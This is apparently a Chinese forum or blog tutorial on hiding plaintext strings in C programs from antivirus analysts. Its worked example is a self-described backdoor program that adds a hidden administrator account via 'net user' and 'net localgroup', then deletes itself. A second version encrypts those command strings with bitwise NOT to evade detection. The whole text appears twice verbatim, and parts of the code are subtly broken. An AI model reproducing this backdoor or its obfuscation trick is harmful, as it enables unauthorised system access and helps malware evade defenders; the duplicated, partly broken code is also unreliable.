在汇编程序中,为了防止AVer对病毒进行反汇编,经常会对其程序中的静态数据资源进行保护,如花指令等等。这在C/C++语言中似乎很难实现。下面说说我的一个保护字符串的方法。
例如下面程序:
//-----------------------------------------------------------
int main()
{
FILE *fp=fopen("haha.txt","wb");
fprintf(fp,"net user aaa bbb /add/r/n");
fprintf(fp,"net localgroup administrators aaa /add/r/n");
fprintf(fp,":CLEAR/r/n");
fprintf(fp,"del hack.exe/r/n"); //hack.exe为程序名
fprintf(fp,"if errorlevel 1 goto CLEAR/r/n");
fprintf(fp,"del haha.txt");
fclose(fp);
system("haha.txt");
return 0;
}
//-----------------------------------------------------------
一个简单开后门的程序。可以用下面方法保护字符串不在可执行文件中明文显示:
//-----------------------------------------------------------
int main()
{
int i;
char msg[]= {
'/x97','/x9E','/x97','/x9E','/xD1','/x8B','/x87','/x8B','/xFF','/x88',
'/x9D','/xFF','/x91','/x9A','/x8B','/xDF','/x8A','/x8C','/x9A','/x8D',
'/xDF','/x9E','/x9E','/x9E','/xDF','/x9D','/x9D','/x9D','/xDF','/xD0',
'/x9E','/x9B','/x9B','/xF2','/xF5','/xFF','/x91','/x9A','/x8B','/xDF',
'/x93','/x90','/x9C','/x9E','/x93','/x98','/x8D','/x90','/x8A','/x8F',
'/xDF','/x9E','/x9B','/x92','/x96','/x91','/x96','/x8C','/x8B','/x8D',
'/x9E','/x8B','/x90','/x8D','/x8C','/xDF','/x9E','/x9E','/x9E','/xDF',
'/xD0','/x9E','/x9B','/x9B','/xF2','/xF5','/xFF','/xC5','/xBC','/xB3',
'/xBA','/xBE','/xAD','/xF2','/xF5','/xFF','/x9B','/x9A','/x93','/xDF',
'/x97','/x9E','/x9C','/x94','/xD1','/x9A','/x87','/x9A','/xF2','/xF5',
'/xFF','/x96','/x99','/xDF','/x9A','/x8D','/x8D','/x90','/x8D','/x93',
'/x9A','/x89','/x9A','/x93','/xDF','/xCE','/xDF','/x98','/x90','/x8B',
'/x90','/xDF','/xBC','/xB3','/xBA','/xBE','/xAD','/xF2','/xF5','/xFF',
'/x9B','/x9A','/x93','/xDF','/x97','/x9E','/x97','/x9E','/xD1','/x8B',
'/x87','/x8B','/xFF','/x97','/x9E','/x97','/x9E','/xD1','/x8B','/x87',
'/x8B','/xFF'
},*pos=msg;
//解密后的明文为:
//{"haha.txt","wb","net user aaa bbb /add/r/n",
// "net localgroup administrators aaa /add/r/n",
// ":CLEAR/r/n","del hack.exe/r/n","if errorlevel 1 goto CLEAR/r/n",
// "del haha.txt","haha.txt"
//}
for(i=0 ; i<strlen(msg) ; i++)
msg =~msg; //解密字符串
FILE *fp=fopen(pos,pos+9);
for(i=0;i<6;i++) {
fprintf(fp,pos);
pos+=strlen(pos)+1;
}
fclose(fp);
system(pos);
return 0;
}
//-----------------------------------------------------------
用到的算法其实很简单,就是将字符串加密后保存在源中,再通过一小段解密代码解密,很是方便。WIN32反汇编后的代码很冗长,其中的明文字符串往往是AVer的侦察信息提示。如果在一堆汇编代码中看不到一段认识的代码,是人头都会大的。这种方法也可以防止别人破译你的程序,破译者在寻找注册代码位置时大多是从PE文件中的明文字符串开始猜测尝试的。当然,此时的字符串加密算法就得复杂一点了。如果程序中需要加密的静态数据很多,可以编写一个代码自动生成器生成静态数据的密文,这里就不再缀言了。
例如下面程序:
//-----------------------------------------------------------
int main()
{
FILE *fp=fopen("haha.txt","wb");
fprintf(fp,"net user aaa bbb /add/r/n");
fprintf(fp,"net localgroup administrators aaa /add/r/n");
fprintf(fp,":CLEAR/r/n");
fprintf(fp,"del hack.exe/r/n"); //hack.exe为程序名
fprintf(fp,"if errorlevel 1 goto CLEAR/r/n");
fprintf(fp,"del haha.txt");
fclose(fp);
system("haha.txt");
return 0;
}
//-----------------------------------------------------------
一个简单开后门的程序。可以用下面方法保护字符串不在可执行文件中明文显示:
//-----------------------------------------------------------
int main()
{
int i;
char msg[]= {
'/x97','/x9E','/x97','/x9E','/xD1','/x8B','/x87','/x8B','/xFF','/x88',
'/x9D','/xFF','/x91','/x9A','/x8B','/xDF','/x8A','/x8C','/x9A','/x8D',
'/xDF','/x9E','/x9E','/x9E','/xDF','/x9D','/x9D','/x9D','/xDF','/xD0',
'/x9E','/x9B','/x9B','/xF2','/xF5','/xFF','/x91','/x9A','/x8B','/xDF',
'/x93','/x90','/x9C','/x9E','/x93','/x98','/x8D','/x90','/x8A','/x8F',
'/xDF','/x9E','/x9B','/x92','/x96','/x91','/x96','/x8C','/x8B','/x8D',
'/x9E','/x8B','/x90','/x8D','/x8C','/xDF','/x9E','/x9E','/x9E','/xDF',
'/xD0','/x9E','/x9B','/x9B','/xF2','/xF5','/xFF','/xC5','/xBC','/xB3',
'/xBA','/xBE','/xAD','/xF2','/xF5','/xFF','/x9B','/x9A','/x93','/xDF',
'/x97','/x9E','/x9C','/x94','/xD1','/x9A','/x87','/x9A','/xF2','/xF5',
'/xFF','/x96','/x99','/xDF','/x9A','/x8D','/x8D','/x90','/x8D','/x93',
'/x9A','/x89','/x9A','/x93','/xDF','/xCE','/xDF','/x98','/x90','/x8B',
'/x90','/xDF','/xBC','/xB3','/xBA','/xBE','/xAD','/xF2','/xF5','/xFF',
'/x9B','/x9A','/x93','/xDF','/x97','/x9E','/x97','/x9E','/xD1','/x8B',
'/x87','/x8B','/xFF','/x97','/x9E','/x97','/x9E','/xD1','/x8B','/x87',
'/x8B','/xFF'
},*pos=msg;
//解密后的明文为:
//{"haha.txt","wb","net user aaa bbb /add/r/n",
// "net localgroup administrators aaa /add/r/n",
// ":CLEAR/r/n","del hack.exe/r/n","if errorlevel 1 goto CLEAR/r/n",
// "del haha.txt","haha.txt"
//}
for(i=0 ; i<strlen(msg) ; i++)
msg =~msg; //解密字符串
FILE *fp=fopen(pos,pos+9);
for(i=0;i<6;i++) {
fprintf(fp,pos);
pos+=strlen(pos)+1;
}
fclose(fp);
system(pos);
return 0;
}
//-----------------------------------------------------------
用到的算法其实很简单,就是将字符串加密后保存在源中,再通过一小段解密代码解密,很是方便。WIN32反汇编后的代码很冗长,其中的明文字符串往往是AVer的侦察信息提示。如果在一堆汇编代码中看不到一段认识的代码,是人头都会大的。这种方法也可以防止别人破译你的程序,破译者在寻找注册代码位置时大多是从PE文件中的明文字符串开始猜测尝试的。当然,此时的字符串加密算法就得复杂一点了。如果程序中需要加密的静态数据很多,可以编写一个代码自动生成器生成静态数据的密文,这里就不再缀言了。